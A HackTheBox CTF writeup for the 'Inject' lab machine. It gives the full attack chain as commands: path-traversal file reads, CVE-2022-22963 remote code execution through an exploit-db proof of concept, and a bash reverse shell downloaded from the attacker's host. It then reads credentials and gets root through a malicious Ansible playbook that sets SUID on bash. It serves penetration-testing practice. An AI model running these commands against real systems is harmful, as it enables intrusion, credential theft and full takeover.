HackTheBox Inject Writeup
Explore the fundamentals of cybersecurity in the Inject Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts#
10.10.11.204 inject.htb
Script to add hosts automatically#
ip="10.10.11.204"
domain="inject.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping#
nmap -sCV inject.htb
Nmap scan report for inject.htb (10.10.11.204)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ca:f1:0c:51:5a:59:62:77:f0:a8:0c:5c:7c:8d:da:f8 (RSA)
| 256 d5:1c:81:c9:7b:07:6b:1c:c1:b4:29:25:4b:52:21:9f (ECDSA)
|_ 256 db:1d:8c:eb:94:72:b0:d3:ed:44:b9:6c:93:a7:f9:1d (ED25519)
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
http://10.10.11.204:8080/upload
Lfi#
curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../etc/passwd' | grep sh$
curl -s 'http://10.10.11.204:8080/show_image?img=pwn' | jq
Output
{
"timestamp": "2024-12-05T05:22:30.253+00:00",
"status": 500,
"error": "Internal Server Error",
"message": "URL [file:/var/www/WebApp/src/main/uploads/pwn] cannot be resolved in the file system for checking its content length",
"path": "/show_image"
}
curl -s 'http://10.10.11.204:8080/show_image?img=../../../pom.xml'
Realpath:
curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../../../../var/www/WebApp/pom.xml' > pom.xml
snyk test --file=pom.xml
CVE-2022-22963#
Output
✗ Remote Code Execution [Critical Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKCLOUD-2436645] in org.springframework.cloud:spring-cloud-function-context@3.2.2
introduced by org.springframework.cloud:spring-cloud-function-web@3.2.2 > org.springframework.cloud:spring-cloud-function-context@3.2.2
https://www.exploit-db.com/exploits/51577
wget https://www.exploit-db.com/raw/51577 -O poc
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo -e '/bin/bash -i >& /dev/tcp/'$vpnip'/9001 0>&1' > rev.sh
python -m http.server
Listener
nc -lvnp 9001
python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'curl http://10.10.14.18:8000/rev.sh -o /tmp/rev.sh'
python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'bash /tmp/rev.sh'
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
cat /home/frank/.m2/settings.xml
su phil
cat /home/phil/user.txt
Although I rarely mention using pspy on Linux, it’s essential to deploy it regularly—similar to linpeas on Linux or BloodHound on Windows—particularly when you’re stuck.
curl -s http://10.10.14.18:8000/pspy64 -o ps
chmod +x ps
./ps
After execution, we observe numerous Ansible scripts in the output.
/usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
/usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
Create an Ansible playbook designed to be executed with root privileges.
cd /opt/automation/tasks/
cat playbook_1.yml
nano shell.yml
- hosts: localhost
tasks:
- name: Set SUID bit on /bin/bash
ansible.builtin.shell:
cmd: "/usr/bin/chmod +s /bin/bash"
Now, we just wait.
watch -n 1 'ls -la /bin/bash'
-rwxr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
Now, we just wait for the SUID changes to take effect.
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
bash -p
cat /root/root.txt